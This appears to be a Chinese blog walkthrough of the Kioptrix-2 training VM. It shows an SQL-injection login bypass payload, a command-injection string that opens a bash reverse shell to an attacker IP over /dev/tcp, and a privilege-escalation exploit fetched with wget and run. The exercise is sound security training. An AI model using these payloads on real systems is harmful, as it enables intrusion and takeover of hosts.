当前位置: 首页 > article >正文

skyler实战渗透笔记—Kioptrix-2

0x00 前言

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

 困难:easy

0x01 信息收集

首先同样的毛病,C段扫不到机器,还是跟上一篇一样的处理方法。

拿到IP后,先端口扫下:

 访问下80端口,发现是个登录页面

 登录页下意识就先考虑SQL注入。

这边有几种方法,首先可以尝试手工注入,直接用Administrator' or 1 #就进来了。

第二就是使用burpsuite,尝试将所有的sql万能密码通过intruder爆破试试,也能爆破出来

 第三种就是直接用sqlmap跑出来。

进来后发现是个命令执行的对话框,考虑直接使用命令执行漏洞:

试了下,ls命令能够直接执行,不用拼接:

那么直接bash反弹出一个shell来:

127.0.0.1; bash -i >& /dev/tcp/192.168.232.129/8888 0>&1

在攻击机器上开启监听

成功获取到反弹shell

查看当前权限:

查看基本信息:

发现是CentOS 4.5,搜索一下4.5的漏洞,发现有一个提权漏洞:

直接下载攻击脚本到远程靶机上

python -m http.server 9999开启服务器,远端wget下载

直接编译,赋权限后执行,成功提权。

0x03 思路整理

本次渗透依然比较简单,就是通过sql注入获取到命令执行环境,然后反弹bash,搜索漏洞提权。其中sqlmap第一次默认参数跑不出来,建议增加risk和levle。


http://www.kler.cn/a/446152.html

相关文章:

  • JavaScript 中常见内置对象的知识点及示例总结
  • 回归预测 | MATLAB实现CNN-BiGRU-Attention卷积神经网络结合双向门控循环单元融合注意力机制多输入单输出回归预测
  • 29、基于springboot的网上购物商城系统研发
  • go-zero(十五)缓存实践:分页列表
  • 【JavaEE进阶】关于Maven
  • PHY6239:具有高精确度AFE的无线MCU芯片,常用在智能穿戴上
  • 2.2.2 进程通信
  • Vue.js前端框架教程5:Vue数据拷贝和数组函数
  • 如何利用Java爬虫获得1688商品详情
  • clickhouse-介绍、安装、数据类型、sql
  • RTMP、RTSP、RTP、HLS、MPEG-DASH协议的简介,以及应用场景
  • 本科阶段最后一次竞赛Vlog——2024年智能车大赛智慧医疗组准备全过程——11上位机与小车交互
  • Unity Runtime控制编辑器的一些操作
  • 如何用Redis实现分布式锁?
  • 账号安全再升级!跨境卫士的网页元素控制功能详解
  • 【单片机】IIC需要注意什么(企业级回答)
  • 使用RTP 协议 对 H264 封包和解包
  • 浏览器可以直接请求 websocket
  • 基于springboot+vue实现的医院急诊(病房)管理系统 (源码+L文+ppt)4-122
  • 变量的作用域和生命周期
  • docker pull失败处理
  • 人脸生成3d模型 Era3D
  • 【漏洞复现】CVE-2023-37461 Arbitrary File Writing
  • Web3.0安全开发实践:探索比特币DeFi生态中的PSBT
  • 网络安全-企业环境渗透2-wordpress任意文件读FFmpeg任意文件读
  • GESP CCF C++八级编程等级考试认证真题 2024年12月